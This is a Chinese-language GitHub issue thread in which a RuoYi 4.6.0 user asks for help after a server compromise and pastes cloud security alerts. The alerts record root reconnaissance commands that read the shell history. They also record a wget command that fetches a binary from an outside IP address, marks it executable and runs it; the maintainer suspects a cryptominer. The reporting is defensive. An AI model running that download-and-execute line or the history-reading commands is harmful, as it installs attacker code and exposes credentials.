### ISSUE TITLE
4.6.0系统被黑客攻击了 能帮忙看下啥问题吗

### ISSUE THREAD

**Issue by kekexi55** [yangzongzhuan/RuoYi#144]

**Comment by zhangmrit** [comment]
具体什么问题呢


| |
张孟如
|
|
***@***.***
|


---- 回复的原邮件 ----
| 发件人 | ***@***.***> |
| 发送日期 | 2022年10月1日 18:47 |
| 收件人 | ***@***.***> |
| 抄送人 | ***@***.***> |
| 主题 | [yangzongzhuan/RuoYi] 4.6.0系统被黑客攻击了 能帮忙看下啥问题吗 (Issue #144) |

**Comment by kekexi55** [comment]
该告警由如下引擎检测发现：
用户名: root
父进程文件路径: /usr/java/jdk1.8.0_301/bin/java
父进程ID: 915532
父进程命令行: java -jar ruoyi-admin.jar /root/application.yml
操作详情:

2022-09-30 22:22:25 929387 /bin/sh -c last

2022-09-30 22:22:54 929388 cat /root/.bash_history

2022-09-30 22:22:54 929388 /bin/sh -c cat /root/.bash_history

2022-09-30 22:23:35 929391 /bin/sh -c netstat -antpo
事件说明: 云安全中心检测到您的服务器上某进程执行了一系列可疑的命令，这些命令与攻击者入侵后通常会执行的命令序列非常相似，建议排查这些命令的父进程，可能为反弹shell、远控木马、存在漏洞的Web服务，或者是合法进程被注入了恶意代码。

**Comment by kekexi55** [comment]
该告警由如下引擎检测发现：
被写入的文件路径: /usr/bin/lvmet
操作文件的进程ID: 929427
操作文件的进程路径: /usr/bin/wget
操作文件的进程命令行参数: wget http://43.156.2.218:9999/lvmet -O /usr/bin/lvmet
用户名: root
命令行: /usr/bin/lvmet -f
进程路径: /usr/bin/lvmet
进程ID: 929430
父进程命令行: /bin/sh -c wget http://43.156.2.218:9999/lvmet -O /usr/bin/lvmet && chmod +x /usr/bin/lvmet && (/usr/bin/lvmet -f &)
父进程文件路径: /usr/bin/bash
父进程ID: 929429

**Comment by kekexi55** [comment]
> 具体什么问题呢 | | 张孟如 | | ***@***.*** |
> […](#)
> ---- 回复的原邮件 ---- | 发件人 | ***@***.***> | | 发送日期 | 2022年10月1日 18:47 | | 收件人 | ***@***.***> | | 抄送人 | ***@***.***> | | 主题 | [yangzongzhuan/RuoYi] 4.6.0系统被黑客攻击了 能帮忙看下啥问题吗 (Issue #144) | — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>
该告警由如下引擎检测发现：
用户名: root
父进程文件路径: /usr/java/jdk1.8.0_301/bin/java
父进程ID: 915532
父进程命令行: java -jar ruoyi-admin.jar /root/application.yml
操作详情:

2022-09-30 22:22:25 929387 /bin/sh -c last

2022-09-30 22:22:54 929388 cat /root/.bash_history

2022-09-30 22:22:54 929388 /bin/sh -c cat /root/.bash_history

2022-09-30 22:23:35 929391 /bin/sh -c netstat -antpo
事件说明: 云安全中心检测到您的服务器上某进程执行了一系列可疑的命令，这些命令与攻击者入侵后通常会执行的命令序列非常相似，建议排查这些命令的父进程，可能为反弹shell、远控木马、存在漏洞的Web服务，或者是合法进程被注入了恶意代码。


该告警由如下引擎检测发现：
被写入的文件路径: /usr/bin/lvmet
操作文件的进程ID: 929427
操作文件的进程路径: /usr/bin/wget
操作文件的进程命令行参数: wget http://43.156.2.218:9999/lvmet -O /usr/bin/lvmet
用户名: root
命令行: /usr/bin/lvmet -f
进程路径: /usr/bin/lvmet
进程ID: 929430
父进程命令行: /bin/sh -c wget http://43.156.2.218:9999/lvmet -O /usr/bin/lvmet && chmod +x /usr/bin/lvmet && (/usr/bin/lvmet -f &)
父进程文件路径: /usr/bin/bash
父进程ID: 929429

**Comment by zhangmrit** [comment]
疑似挖矿，也有可能是泄露账号导致，从系统内操作的，如果确认是ruoyi-admin引发的话，但这一般并不可能，所以你该排查操作记录中是否有人异常操作或者入侵脚本


| |
张孟如
|
|
***@***.***
|


---- 回复的原邮件 ----
| 发件人 | ***@***.***> |
| 发送日期 | 2022年10月1日 19:08 |
| 收件人 | ***@***.***> |
| 抄送人 | ***@***.***> ,
***@***.***> |
| 主题 | Re: [yangzongzhuan/RuoYi] 4.6.0系统被黑客攻击了 能帮忙看下啥问题吗 (Issue #144) |

具体什么问题呢 | | 张孟如 | | @.*** |
…
---- 回复的原邮件 ---- | 发件人 | @.> | | 发送日期 | 2022年10月1日 18:47 | | 收件人 | @.> | | 抄送人 | @.> | | 主题 | [yangzongzhuan/RuoYi] 4.6.0系统被黑客攻击了 能帮忙看下啥问题吗 (Issue #144) | — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you are subscribed to this thread.Message ID: @.>
该告警由如下引擎检测发现：
用户名: root
父进程文件路径: /usr/java/jdk1.8.0_301/bin/java
父进程ID: 915532
父进程命令行: java -jar ruoyi-admin.jar /root/application.yml
操作详情:

2022-09-30 22:22:25 929387 /bin/sh -c last

2022-09-30 22:22:54 929388 cat /root/.bash_history

2022-09-30 22:22:54 929388 /bin/sh -c cat /root/.bash_history

2022-09-30 22:23:35 929391 /bin/sh -c netstat -antpo
事件说明: 云安全中心检测到您的服务器上某进程执行了一系列可疑的命令，这些命令与攻击者入侵后通常会执行的命令序列非常相似，建议排查这些命令的父进程，可能为反弹shell、远控木马、存在漏洞的Web服务，或者是合法进程被注入了恶意代码。

该告警由如下引擎检测发现：
被写入的文件路径: /usr/bin/lvmet
操作文件的进程ID: 929427
操作文件的进程路径: /usr/bin/wget
操作文件的进程命令行参数: wget http://43.156.2.218:9999/lvmet -O /usr/bin/lvmet
用户名: root
命令行: /usr/bin/lvmet -f
进程路径: /usr/bin/lvmet
进程ID: 929430
父进程命令行: /bin/sh -c wget http://43.156.2.218:9999/lvmet -O /usr/bin/lvmet && chmod +x /usr/bin/lvmet && (/usr/bin/lvmet -f &)
父进程文件路径: /usr/bin/bash
父进程ID: 929429
